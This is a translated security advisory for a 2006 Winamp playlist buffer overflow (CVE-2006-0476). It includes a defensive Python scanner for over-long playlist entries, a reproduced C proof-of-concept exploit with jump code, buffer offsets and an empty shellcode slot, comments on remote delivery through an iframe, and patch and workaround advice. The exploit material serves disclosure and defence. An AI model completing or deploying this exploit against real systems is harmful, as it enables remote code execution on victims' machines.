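Nullsoft Winamp Malformed Playlist File Handling Remote Buffer Overflow Vulnerability

Release date: 2006-01-31
Updated: 2006-02-06

Affected systems:
Nullsoft Winamp 5.11
Unaffected systems:
Nullsoft Winamp 5.13
Description:
BUGTRAQ  ID: 16410
CVE(CAN) ID: CVE-2006-0476

Winamp is a free audio player released by Nullsoft that supports multiple audio formats.

Winamp has a buffer overflow vulnerability in its handling of playlist files. An attacker can construct an overly long full path, which may be the file name or UNC name of a file share that does not actually exist. If a user opens such a file, a stack buffer is overwritten, leading to arbitrary code execution.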
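
A defensive check for the condition described above, added here as an example and not part of the original advisory or of Winamp itself: it parses .pls and .m3u playlists and reports path entries longer than Windows MAX_PATH (260 bytes). That threshold, the function names and the sample playlists are assumptions constructed for illustration.

```python
import re

MAX_PATH = 260  # Windows MAX_PATH, used here as an assumed sanity limit per entry

# "FileN=value" lines of a .pls playlist (spaces around "=" are tolerated)
PLS_ENTRY = re.compile(rb"^\s*File(\d+)\s*=\s*(.*)$", re.IGNORECASE)


def suspicious_entries(data: bytes, kind: str, limit: int = MAX_PATH):
    """Return (line_no, length, is_unc) for each playlist entry longer than limit.

    kind is "pls" or "m3u". Input is raw bytes so binary filler is measured as-is.
    """
    findings = []
    for line_no, raw in enumerate(re.split(rb"\r\n|\r|\n", data), start=1):
        if kind == "pls":
            match = PLS_ENTRY.match(raw)
            if not match:
                continue
            value = match.group(2)
        else:  # m3u: every non-empty line that is not a "#" directive is a path
            value = raw.strip()
            if not value or value.startswith(b"#"):
                continue
        if len(value) > limit:
            findings.append((line_no, len(value), value.startswith(b"\\\\")))
    return findings


def scan_file(path: str, limit: int = MAX_PATH):
    """Scan one playlist file on disk, choosing the parser from its extension."""
    kind = "m3u" if path.lower().endswith((".m3u", ".m3u8")) else "pls"
    with open(path, "rb") as fh:
        return suspicious_entries(fh.read(), kind, limit)


# Constructed samples: one ordinary playlist, one with an over-long UNC entry.
BENIGN_PLS = (b"[playlist]\r\nFile1=C:\\Music\\track01.mp3\r\nTitle1=Track 1\r\n"
              b"Length1=215\r\nNumberOfEntries=1\r\nVersion=2\r\n")
OVERLONG_PLS = (b"[playlist]\r\nFile1=\\\\" + b"A" * 1000 +
                b"\r\nTitle1=x\r\nLength1=1\r\nNumberOfEntries=1\r\nVersion=2\r\n")

if __name__ == "__main__":
    print(suspicious_entries(BENIGN_PLS, "pls"))
    print(suspicious_entries(OVERLONG_PLS, "pls"))
```

Run `scan_file` over mail attachments, download folders or web-proxy captures to triage playlists before they reach a player that has not been upgraded.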

<*Source: Alan Mccaig (b0fnet@yahoo.com)
          ruben unteregger (ruben.unteregger@era-it.ch)

  Links:  http://www.us-cert.gov/cas/techalerts/TA06-032A.html
          http://www.idefense.com/intelligence/vulnerabilities/display.php?id=377
*>

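Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

ATmaCA provided the following test code: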

/*
*
* Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)
* Bug discovered & exploit coded by ATmaCA
* Web: http://www.spyinstructors.com && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Tested with:
* Winamp 5.12 on Win XP Pro Sp2
*
*/

/*
* Usage:
*
* Execute exploit, it will create "crafted.pls" in current directory.
* Double click the file, or single click right and then select "open".
* And Winamp will launch a Calculator (calc.exe)
*
*/

/*
*
* To use it remotely,
* make an HTML page containing an iframe linking to the pls file.
*
* http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm
*
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* malloc, exit */
#include <string.h>   /* memset, memcpy */

#define BUF_LEN 0x045D
#define PLAYLIST_FILE "crafted.pls"

char szPlayListHeader1[] = "[playlist]\r\nFile1=\\\\";
char szPlayListHeader2[] = "\r\nTitle1=~BOF~\r\nLength1=FFF\r\nNumberOfEntries=1\r\nVersion=2\r\n";

// Jump to shellcode
char jumpcode[] = "\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4";

// Harmless Calc.exe (payload bytes not reproduced here)
char shellcode[] = "";

int main(int argc, char *argv[])
{
        printf("\nWinamp 5.12 Remote Buffer Overflow Universal Exploit");
        printf("\nBug discovered & exploit coded by ATmaCA");
        printf("\nWeb: http://www.spyinstructors.com && http://www.atmacasoft.com");
        printf("\nE-Mail: atmaca@icqmail.com");
        printf("\nCredit to Kozan");

        FILE *File;
        char *pszBuffer;

        if ((File = fopen(PLAYLIST_FILE, "w+b")) == NULL) {
                printf("\n [Err:] fopen()");
                exit(1);
        }

        /* Fill the whole entry with 0x90, then place each piece at its fixed offset */
        pszBuffer = (char*)malloc(BUF_LEN);
        memset(pszBuffer, 0x90, BUF_LEN);
        memcpy(pszBuffer, szPlayListHeader1, sizeof(szPlayListHeader1) - 1);
        memcpy(pszBuffer + 0x036C, shellcode, sizeof(shellcode) - 1);
        memcpy(pszBuffer + 0x0412, jumpcode, sizeof(jumpcode) - 1);
        memcpy(pszBuffer + 0x0422, szPlayListHeader2, sizeof(szPlayListHeader2) - 1);

        fwrite(pszBuffer, BUF_LEN, 1, File);
        fclose(File);

        printf("\n\n" PLAYLIST_FILE " has been created in the current directory.\n");
        return 1;
}

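Recommendations:
Workaround:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measure to reduce the threat:

* Remove the file associations for the m3u and pls file extensions.

Vendor patch:

Nullsoft
--------
The vendor has released an upgrade that fixes this security issue. Download it from the vendor's home page:

http://www.winamp.com/player/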

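This security advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.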